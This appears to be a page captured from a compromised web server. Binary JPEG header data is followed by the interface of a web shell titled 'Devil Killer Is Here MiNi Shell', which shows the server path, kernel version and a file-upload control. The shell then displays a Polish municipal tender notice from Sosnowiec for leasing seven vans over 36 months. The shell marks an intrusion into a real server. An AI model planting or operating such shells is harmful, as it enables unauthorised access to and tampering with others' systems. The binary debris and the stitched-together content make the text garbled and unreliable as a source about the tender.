JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20200729/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20200729/567950-N-2020.html

 <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 567950-N-2020 z dnia 2020-07-29 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Miejski Zakład Usług Komunalnych</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Najem długoterminowy na okres 36 miesięcy trzech samochodów 9-cio osobowych i czterech samochodów 7-dmio osobowych z zabudową typu wywrotka trójstronna.</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Miejski Zakład Usług Komunalnych</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">27681549000000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Plonów</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">22i</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">41-214</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Sosnowiec</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">śląskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">32 291 79 22, </span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">sekretariat@mzuk.sosnowiec.pl, </span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">-</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.mzuk.sosnowiec.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Jednostki organizacyjne administracji samorządowej</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.mzuk.sosnowiec.pl/BIP</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.mzuk.sosnowiec.pl/BIP</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Wymagane jest złożenie oferty w formie pisemnej.</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">41-214 Sosnowiec, ul. Plonów 22i, sekretariat, pokój nr 20.</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Najem długoterminowy na okres 36 miesięcy trzech samochodów 9-cio osobowych i czterech samochodów 7-dmio osobowych z zabudową typu wywrotka trójstronna.</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">ZP90/2020</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1.1	Przedmiotem zamówienia jest najem długoterminowy na okres 36 miesięcy trzech samochodów 9-cio osobowych i czterech samochodów 7-dmio osobowych z zabudową typu wywrotka trójstronna, z podziałem na niżej wskazane części/zadania:Dla celów złożenia ofert częściowych przedmiot zamówienia zostaje podzielony na zadania:1.	Długoterminowy najem jednego 9-osobowego samochodu osobowego na potrzeby Działu Inwestycji i Remontów	zadanie A2.	Długoterminowy najem jednego 9-osobowego samochodu osobowego na potrzeby Działu Utrzymania Czystości	zadanie B3.	Długoterminowy najem jednego 9-osobowego samochodu osobowego na potrzeby Działu Utrzymania Czystości	zadanie C4.	Długoterminowy najem jednego 7- osobowego samochodu osobowego z zabudową typu wywrotka trójstronna na potrzeby Działu Botaniczno Zoologicznego	zadanie D5.	Długoterminowy najem jednego 7- osobowego samochodu osobowego z zabudową typu wywrotka trójstronna na potrzeby Działu Utrzymania Czystości	zadanie E6.	Długoterminowy najem jednego 7- osobowego samochodu osobowego z zabudową typu wywrotka trójstronna na potrzeby Działu Utrzymania Czystości	zadanie F7.	Długoterminowy najem jednego 7- osobowego samochodu osobowego z zabudową typu wywrotka trójstronna na potrzeby Działu Utrzymania Czystości	zadanie GWszystkie samochody winny być fabrycznie nowe, nieuszkodzone, nienaprawiane, wolne od wad fabrycznych, na potrzeby Miejskiego Zakładu Usług Komunalnych w Sosnowcu wraz ze świadczeniem obsługi serwisowej, Assistance na terenie RP, ubezpieczenia oraz innych czynności wskazanych poniżej.Wynajmowane samochody powinny spełniać podane w SIWZ parametry techniczno-użytkowe i wyposażenie.Dopuszcza się lepsze parametry techniczne samochodów i ich wyposażenia.1.4	Dla każdego zadania, w ramach wydania, przekazania samochodu i dokumentów Zamawiającemu, Wykonawca zapewni Zamawiającemu następujący zakres usług w ramach miesięcznej stawki opłat za wynajem pojazdów:a)	Finansowanie – koszt zakupu samochodu, rejestrację samochodu, przygotowanie samochodu do wydania i przekazania samochodu w siedzibie Zamawiającego.b)	Ubezpieczenie i likwidację szkód: AC, OC, NW bez udziału własnego Zamawiającego w szkodach przez cały okres trwania umowy, zabezpieczenie pełnego postępowania przy likwidacji szkód. Zamawiający nie będzie ponosił kosztów napraw nie objętych polisą ubezpieczeniową, nie przewiduje się dodatkowych kosztów związanych z realizacją usług w ramach polisy ubezpieczeniowej, chyba że zdarzenie spowodowane będzie działaniem kierowcy pod wpływem alkoholu lub innych środków odurzających. Ponadto Zamawiający oczekuje świadczenia usług w zakresie polisy ubezpieczeniowej najwyższego poziomu, tzn. z uwzględnieniem wszelkich zdarzeń losowe, które może obejmować polisa. W przypadku zaistnienia szkody całkowitej samochodu Wykonawca dostarczy w zamian Zamawiającemu samochód o porównywalnych parametrach technicznych. Wykonawca w ramach każdego zadania zapewni Assistance na terenie RP.c)	Samochód zastępczy – będzie dostarczony i przekazany Zamawiającemu w miejscu przez niego wskazanym na terenie Miasta Sosnowca, do 12 godzin, liczonych od momentu zgłoszenia Zamawiającego (na czas naprawy, przeglądu trwającego ponad 24 godziny lub na czas likwidacji szkody) w dni robocze i wolne od pracy, bez ograniczeń czasowych. Wykonawca zapewni bez dodatkowych opłat, pojazd zastępczy o parametrach podobnych do parametrów pojazdu podstawowego. d)	Pełną obsługę serwisową (mechaniczną i blacharsko – lakierniczą) w Autoryzowanych Stacjach Obsługi, zgodnie z wymaganiami producenta pojazdu oraz wynikającą z eksploatacji pojazdu.e)	Serwis ogumienia. f)	Usługę holowania samochodu.g)	Administrowanie systemem serwisowym, przez co rozumie się w szczególności nadzór nad wykonywaniem planowanych czynności serwisowych, badań technicznych itp. 1.5	Zamawiający określa średni roczny limit kilometrów na poziomie 36.000 km – dla każdego z pojazdów.1.6	Zamawiający nie będzie ponosił innych kosztów niż opłaty za wynajem, za wyjątkiem kosztów i opłat związanych z użytkowaniem samochodu w zakresie bieżącej eksploatacji: mycie, płyny do spryskiwaczy, paliwo, oleje (z wyłączeniem obowiązkowych wymian wynikających z książki serwisowej), opłat parkingowych i opłat za przejazd autostradą.1.7	Jeżeli Zamawiający w opisie przedmiotu zamówienia wskazał znaki towarowe, patenty lub pochodzenia, a także normy, aprobaty techniczne oraz systemy odniesienia, dopuszcza zaoferowanie rozwiązań równoważnych opisanym, pod warunkiem zachowania przez nie takich samych minimalnych parametrów technicznych, jakościowych oraz funkcjonalnych itp. Wykonawca, który powołuje się na rozwiązana równoważne opisane przez Zamawiającego, jest obowiązany wskazać, że oferowany przez niego przedmiot zamówienia spełnia wymagania określone przez Zamawiającego.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">50111100-7</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach">36</span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">Przekazanie zarejestrowanych i gotowych do eksploatacji samochodów Zamawiającemu w ramach zadania A,B,C,D,E,F i G – maksymalnie do 30 dni kalendarzowych od dnia podpisania umowy, przy czym przekazanie zarejestrowanych i gotowych do eksploatacji samochodów Zamawiającemu stanowi jedno z kryteriów oceny ofert,natomiast wynajem samochodu osobowego – 36 miesięcy od dnia podpisania przez Zamawiającego i Wykonawcę protokołu odbioru pojazdu.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie formułuje żadnego wymagania.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie formułuje żadnego wymagania.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Zamawiający uzna spełnienie przedmiotowego warunku jeżeli Wykonawca wykaże należyte wykonanie, a w przypadku świadczeń okresowych lub ciągłych również wykonywanie, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie – co najmniej jednego zamówienia obejmującego swoim zakresem najem długoterminowy prowadzony przez okres minimum 24 miesięcy dla przynajmniej jednego samochodu osobowego</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)</span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span 